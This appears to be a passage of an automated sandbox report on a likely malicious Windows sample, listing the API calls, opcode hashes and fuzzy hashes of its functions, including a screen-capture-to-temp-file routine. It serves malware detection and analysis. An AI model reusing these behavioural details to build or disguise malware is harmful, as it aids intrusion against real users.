                                                    • Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684
                                                    APIs
                                                      • Part of subcall function 02522141: GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 02522178
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                    • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,02520A1C,?,0252BC4D,02520A1C,?,?,?,?,?,02520A1C,?,?), ref: 0252B61B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                    • String ID:
                                                    • API String ID: 2016158738-0
                                                    • Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                    • Instruction ID: e524c27264fc66d8e4060a8f62e0d3f1a6ca91eed501b24e3dc5ca3e5383a231
                                                    • Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                    • Instruction Fuzzy Hash: CCF022363007151FDB245F39DC80B7A7B95FF8272CF14402CFA058B6D0E771A8028A08
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0252047A,?,00000004), ref: 0252547A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                    • Instruction ID: 73470c34faa5dd0c7aa37747fee400ac0d5c163bb0277ad0fd2df3a0065606ee
                                                    • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                    • Instruction Fuzzy Hash: 25F02B31680328BFDB055F50CC01F6E7B26FF45B02F504115FD05661D0EA719E24AACD
                                                    APIs
                                                      • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
                                                    • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                    • String ID:
                                                    • API String ID: 1272433827-0
                                                    • Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                    • Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
                                                    • Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                    • Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49
                                                    APIs
                                                      • Part of subcall function 0251E654: RtlEnterCriticalSection.NTDLL(020A0DAF), ref: 0251E663
                                                    • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 0252506C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                    • String ID:
                                                    • API String ID: 1272433827-0
                                                    • Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                    • Instruction ID: 565fa28f12e3add0dc57819301f88fc9bc5dd0c281f0eb232535a90c93a64ecd
                                                    • Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                    • Instruction Fuzzy Hash: 93F03C32A10305DBE714EF68DD45B5D77A1BF85721F104166F900DB2E1C77599448F49
                                                    APIs
                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                    • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                    • String ID:
                                                    • API String ID: 2016158738-0
                                                    • Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                    • Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
                                                    • Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                    • Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794
                                                    APIs
                                                      • Part of subcall function 02522141: GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 02522178
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                    • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0252BCAB,02520A1C,?,?,?,?,?,02520A1C,?,?,?), ref: 0252B520
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                    • String ID:
                                                    • API String ID: 2016158738-0
                                                    • Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                    • Instruction ID: 4e4210cd9837b8e26f7833caa9ede76c6f2c094ad05c1afc1f697fcdf251f835
                                                    • Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                    • Instruction Fuzzy Hash: 14F0203A30021957CB089F36E844B6ABF94EFC2754B0A0059EF098B2D0D2319842C794
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                    • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                    • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                    • Instruction Fuzzy Hash:
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(00410672,024FFE60), ref: 025008D2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                    • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                    • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                    • Instruction Fuzzy Hash:
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: HeapProcess
                                                    • String ID:
                                                    • API String ID: 54951025-0
                                                    • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                    • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                    • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                    • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                    • Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
                                                    • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                    • Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                    • Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
                                                    • Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                    • Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                    • Instruction ID: 1979d2e4954bd3062260c6420e32b2847358c6d6ba12991bc279e7ba04606c98
                                                    • Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                    • Instruction Fuzzy Hash: 80D1C6321081A30EEB2D4A3D847403AFFE2BA461A570E479DE8F7CB5C6EF24D654D664
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                    • Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
                                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                    • Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                    • Instruction ID: d95af805931fc06b81efe11de810bcea937337f73128d633ee4bddfdf58ed9a0
                                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                    • Instruction Fuzzy Hash: B29144732090E34AFB7E463E847813EFFE16A422A531A079ED4F2CA1C5EF24D564D624
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                    • Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
                                                    • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                    • Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                    • Instruction ID: 827481657a956e450fbde7166ae0fac805b11544aa72e55173ffe01c38955fa8
                                                    • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                    • Instruction Fuzzy Hash: 5A9153721090E34AFB7A467E897D13EFFE16A421A530E0B9DE4F2CA1C5EF24C564D624
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                    • Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
                                                    • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                    • Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                    • Instruction ID: fb52a02b8e59318d54a66af415e88120552136b96c43fc78520229e0672087bd
                                                    • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                    • Instruction Fuzzy Hash: 059164722090E30AFB2D463D857453EFFE1AA461A570A0B9EE4F2CF1C5EF24D664D624
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                    • Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
                                                    • Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                    • Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                    • Instruction ID: e9376ae63a34bc09890512311abc0d6d9faab7c813eb248513f8b3118aa40b06
                                                    • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                    • Instruction Fuzzy Hash: 13616C7264270976FF38692C8890BBEBBB5BF81B18F040919E842DF2C1D719E942C75D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                    • Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
                                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                    • Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                    • Instruction ID: d96b53fa0f0ab57548cdaa15937902aa17178b0fe16c2c33cdf16fdd4f441fb6
                                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                    • Instruction Fuzzy Hash: 108164722090E349FB69463E847453EFFE16A452A970A0B9ED4F2CB1C1FF24C664D624
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction ID: 4f02105b888c5ffb23e6549d66153fc5ee36f3aa5bf321a4af7195cc47f749ab
                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction Fuzzy Hash: 8511C87720004267F6788A2ED4BC6BAEB96FAC523873D5A7AD0414B658D322E145D608
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902949566.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AF9000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_af9000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                    • Instruction ID: dadaf67bea7a502976efaa149c4368e0914a28b4629b40c124e114dcc1c123d5
                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                    • Instruction Fuzzy Hash: 13115A72340104AFD754DF95DCC1FB773EAEB89360B2980A9EA04CB312D675E841C7A0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                    • Instruction ID: a1c71ae27c6bec535a0940fb186207137ad1d37a2fc915d52da6caf67d1247ae
                                                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                    • Instruction Fuzzy Hash: 0D01F273A116008FDF61CF20C904BAB33E9FBC6206F0550A6DA0A9738AE370A8418B80
                                                    APIs
                                                    • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
                                                    • GetClientRect.USER32(?,?), ref: 0040214A
                                                    • GetDC.USER32(?), ref: 00402151
                                                    • CreateSolidBrush.GDI32(00646464), ref: 00402164
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00402178
                                                    • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00402191
                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
                                                    • MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
                                                    • SelectObject.GDI32(00000000,00000000), ref: 004021EA
                                                    • SetBkMode.GDI32(?,00000001), ref: 00402267
                                                    • SetTextColor.GDI32(?,00000000), ref: 00402276
                                                    • _wcslen.LIBCMT ref: 0040227F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                    • String ID: Tahoma
                                                    • API String ID: 3832963559-3580928618
                                                    • Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                    • Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
                                                    • Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                    • Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14
                                                    APIs
                                                    • DestroyWindow.USER32(?), ref: 004025CD
                                                    • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
                                                    • ReleaseCapture.USER32 ref: 004025F2
                                                    • GetDC.USER32(00000000), ref: 00402619
                                                    • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
                                                    • CreateCompatibleDC.GDI32(?), ref: 004026A9
                                                    • SelectObject.GDI32(00000000,00000000), ref: 004026B3
                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
                                                    • ShowWindow.USER32(?,00000000), ref: 004026EA
                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
                                                    • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
                                                    • DeleteFileW.KERNEL32(?), ref: 00402731
                                                    • DeleteDC.GDI32(00000000), ref: 00402738
                                                    • DeleteObject.GDI32(00000000), ref: 0040273F
                                                    • ReleaseDC.USER32(00000000,?), ref: 0040274D
                                                    • DestroyWindow.USER32(?), ref: 00402754
                                                    • SetCapture.USER32(?), ref: 004027A1
                                                    • GetDC.USER32(00000000), ref: 004027D5
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 004027EB
                                                    • GetKeyState.USER32(0000001B), ref: 004027F8
                                                    • DestroyWindow.USER32(?), ref: 0040280D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                    • String ID: gya
                                                    • API String ID: 2545303185-1989253062
                                                    • Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                    • Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
                                                    • Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                    • Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free$Info
                                                    • String ID:
                                                    • API String ID: 2509303402-0
                                                    • Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                    • Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
